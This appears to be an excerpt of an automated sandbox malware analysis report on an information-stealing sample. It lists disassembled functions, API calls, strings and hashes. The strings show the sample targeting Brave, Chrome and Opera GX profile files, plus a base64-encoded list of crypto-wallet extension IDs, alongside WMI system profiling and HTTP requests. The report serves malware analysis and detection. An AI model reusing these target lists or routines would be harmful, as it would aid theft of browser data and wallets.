                                                                                                                                                                                            • Part of subcall function 00028DDB: lstrlenA.KERNEL32(?), ref: 00028FEF
                                                                                                                                                                                            • Part of subcall function 00029549: lstrlenA.KERNEL32(?), ref: 00029970
                                                                                                                                                                                            • Part of subcall function 00029549: lstrlenA.KERNEL32(?), ref: 0002998B
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 0002A553
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0002A613
                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 0002A6AA
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                          • FindNextFileA.KERNELBASE(?,?), ref: 0002A76E
                                                                                                                                                                                          • FindClose.KERNEL32(?), ref: 0002A782
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                                          • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                          • API String ID: 4173076446-1189830961
                                                                                                                                                                                          • Opcode ID: a0ff805bedfd56b8b37d4b9c88c7f98be3f60600ff6623a184199524992e0793
                                                                                                                                                                                          • Instruction ID: 99410cf32b15d49f58f48a18f655259326fd6dce1d5efd26162af4242858b960
                                                                                                                                                                                          • Opcode Fuzzy Hash: a0ff805bedfd56b8b37d4b9c88c7f98be3f60600ff6623a184199524992e0793
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3D42FA3290112DABCF62FB64ED4ABCD7775AF04314F4501E1B908A7122DB31AE999F91
                                                                                                                                                                                          Function 6C4135A0 Relevance: 38.8, APIs: 16, Strings: 6, Instructions: 294stringtimeCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 2073 6c4135a0-6c4135be 2074 6c4135c4-6c4135ed InitializeCriticalSectionAndSpinCount getenv 2073->2074 2075 6c4138e9-6c4138fb call 6c44b320 2073->2075 2077 6c4135f3-6c4135f5 2074->2077 2078 6c4138fc-6c41390c strcmp 2074->2078 2081 6c4135f8-6c413614 QueryPerformanceFrequency 2077->2081 2078->2077 2080 6c413912-6c413922 strcmp 2078->2080 2082 6c413924-6c413932 2080->2082 2083 6c41398a-6c41398c 2080->2083 2084 6c41361a-6c41361c 2081->2084 2085 6c41374f-6c413756 2081->2085 2088 6c413622-6c41364a _strnicmp 2082->2088 2089 6c413938 2082->2089 2083->2081 2084->2088 2090 6c41393d 2084->2090 2086 6c41375c-6c413768 2085->2086 2087 6c41396e-6c413982 2085->2087 2091 6c41376a-6c4137a1 QueryPerformanceCounter EnterCriticalSection 2086->2091 2087->2083 2092 6c413650-6c41365e 2088->2092 2093 6c413944-6c413957 _strnicmp 2088->2093 2089->2085 2090->2093 2094 6c4137b3-6c4137eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2091->2094 2095 6c4137a3-6c4137b1 2091->2095 2096 6c41395d-6c41395f 2092->2096 2097 6c413664-6c4136a9 GetSystemTimeAdjustment 2092->2097 2093->2092 2093->2096 2100 6c4137ed-6c4137fa 2094->2100 2101 6c4137fc-6c413839 LeaveCriticalSection 2094->2101 2095->2094 2098 6c413964 2097->2098 2099 6c4136af-6c413749 call 6c44c110 2097->2099 2098->2087 2099->2085 2100->2101 2103 6c413846-6c4138ac call 6c44c110 2101->2103 2104 6c41383b-6c413840 2101->2104 2108 6c4138b2-6c4138ca 2103->2108 2104->2091 2104->2103 2109 6c4138dd-6c4138e3 2108->2109 2110 6c4138cc-6c4138db 2108->2110 2109->2075 2110->2108 2110->2109
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(6C49F688,00001000), ref: 6C4135D5
                                                                                                                                                                                          • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4135E0
                                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 6C4135FD
                                                                                                                                                                                          • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C41363F
                                                                                                                                                                                          • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C41369F
                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C4136E4
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 6C413773
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49F688), ref: 6C41377E
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49F688), ref: 6C4137BD
                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 6C4137C4
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(6C49F688), ref: 6C4137CB
                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(6C49F688), ref: 6C413801
                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 6C413883
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C413902
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C413918
                                                                                                                                                                                          • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C41394C
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • QPC, xrefs: 6C4138FC
                                                                                                                                                                                          • ZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxU, xrefs: 6C413868, 6C413873
                                                                                                                                                                                          • AuthcAMDenti, xrefs: 6C413946
                                                                                                                                                                                          • MOZ_TIMESTAMP_MODE, xrefs: 6C4135DB
                                                                                                                                                                                          • GTC, xrefs: 6C413912
                                                                                                                                                                                          • GenuntelineI, xrefs: 6C413639
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                          • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC$ZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHxU
                                                                                                                                                                                          • API String ID: 301339242-2808244485
                                                                                                                                                                                          • Opcode ID: be8f19c8d45bd20c7f24d0939156e85123bd056d74f0bf20f5b22d9ec046d1cb
                                                                                                                                                                                          • Instruction ID: eea254f550364afa130a3547df552fcf67f9bfdd13aad9b8ffcbeffb75cb7ce5
                                                                                                                                                                                          • Opcode Fuzzy Hash: be8f19c8d45bd20c7f24d0939156e85123bd056d74f0bf20f5b22d9ec046d1cb
                                                                                                                                                                                          • Instruction Fuzzy Hash: DCB18171B093209FEB08EF29C844F2A7BF9BB99705F15892DF899D3750D67099058B81
                                                                                                                                                                                          Function 00035FD1 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                          • API String ID: 2178766154-445461498
                                                                                                                                                                                          • Opcode ID: 2ce864b1324a9e35429d4b3b358be7c3bb5b64f8462cbfc5fbc1a3c652c1ff11
                                                                                                                                                                                          • Instruction ID: da18715862cd5c8170810cda203899e991d058b02fdaeacc0355ccd920bed2c8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ce864b1324a9e35429d4b3b358be7c3bb5b64f8462cbfc5fbc1a3c652c1ff11
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8081197190022DABCF61EB60EC4AACE77B8FF08305F4585E5E548A7151DF31AA898F91
                                                                                                                                                                                          Function 00031807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0003180E
                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000000,0000004C,00033EF9,Install Date: ,000568B0,00000000,Windows: ,000568A0,Work Dir: In memory,00056888), ref: 0003181F
                                                                                                                                                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00031830
                                                                                                                                                                                          • CoCreateInstance.OLE32(00052F00,00000000,00000001,00052E30,?), ref: 0003184A
                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00031880
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 000318DB
                                                                                                                                                                                            • Part of subcall function 00031757: __EH_prolog3_catch.LIBCMT ref: 0003175E
                                                                                                                                                                                            • Part of subcall function 00031757: CoCreateInstance.OLE32(000531B0,00000000,00000001,0005AF60,?,00000018,00031901,?), ref: 00031781
                                                                                                                                                                                            • Part of subcall function 00031757: SysAllocString.OLEAUT32(?), ref: 0003178E
                                                                                                                                                                                            • Part of subcall function 00031757: _wtoi64.MSVCRT ref: 000317C1
                                                                                                                                                                                            • Part of subcall function 00031757: SysFreeString.OLEAUT32(?), ref: 000317DA
                                                                                                                                                                                            • Part of subcall function 00031757: SysFreeString.OLEAUT32(00000000), ref: 000317E1
                                                                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0003190A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00031916
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0003191D
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 0003195C
                                                                                                                                                                                          • wsprintfA.USER32 ref: 00031949
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                                          • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                                          • API String ID: 2280294774-461178377
                                                                                                                                                                                          • Opcode ID: 99c944d6b587ac0ee8ead6ff73fd3cf7cc479f2d099d30365fdd4d990e9d5c59
                                                                                                                                                                                          • Instruction ID: 3f652a77c5e54fa64ba5f912d0e8d884c48997303e88aa48041e78ff3392d837
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99c944d6b587ac0ee8ead6ff73fd3cf7cc479f2d099d30365fdd4d990e9d5c59
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B416C71900209BBDB219BD5DC89EEFBBBCEF89B12F10411AF611AB190D6759941CB20
                                                                                                                                                                                          Function 0003C472 Relevance: 26.7, APIs: 13, Strings: 2, Instructions: 440COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: /$UT
                                                                                                                                                                                          • API String ID: 0-1626504983
                                                                                                                                                                                          • Opcode ID: 2260637de46da554f70d510a9355b51580055f514bb9bad62097bb6f18fec524
                                                                                                                                                                                          • Instruction ID: 2f4149c67e490c7497c6d514aaf83e4cf9d4c8976f9d0a4f14f0d53a92526493
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2260637de46da554f70d510a9355b51580055f514bb9bad62097bb6f18fec524
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D0272B1D042688BEF62DF64C881BAE7BB9AF45304F0444EAD949F7242D7349E84CF95
                                                                                                                                                                                          Function 00026963 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 161networkfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 000269C5
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 000269DF
                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026A0E
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00026A4D
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026A7D
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026A88
                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00026AAC
                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 00026B40
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026B50
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026B5C
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026B68
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                          • String ID: ERROR$ERROR$GET
                                                                                                                                                                                          • API String ID: 3863758870-2509457195
                                                                                                                                                                                          • Opcode ID: 07747115a6e225fef9f3cb21438c02d0e461cf133ee089cc7b9a391b500f8b79
                                                                                                                                                                                          • Instruction ID: 0a3210887175a43a6758c794d710ce04242f66094cb634bd52a1da699ac4f7d4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 07747115a6e225fef9f3cb21438c02d0e461cf133ee089cc7b9a391b500f8b79
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B514B71900169AFDF219B60EC85AEEB7BCFB04344F0181E6F949A6151DB315EC59F90
                                                                                                                                                                                          Function 00021D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,0005A9AC,0005A9B0,000569FA,000569F7,00037908,?,00000000), ref: 00021FA4
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005A9B4), ref: 00021FD7
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,0005A9B8), ref: 00021FF1
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,0005A9BC,0005A9C0,?,0005A9C4,000569FB), ref: 000220DD
                                                                                                                                                                                          • CopyFileA.KERNEL32(?,?,00000001), ref: 000222C3
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
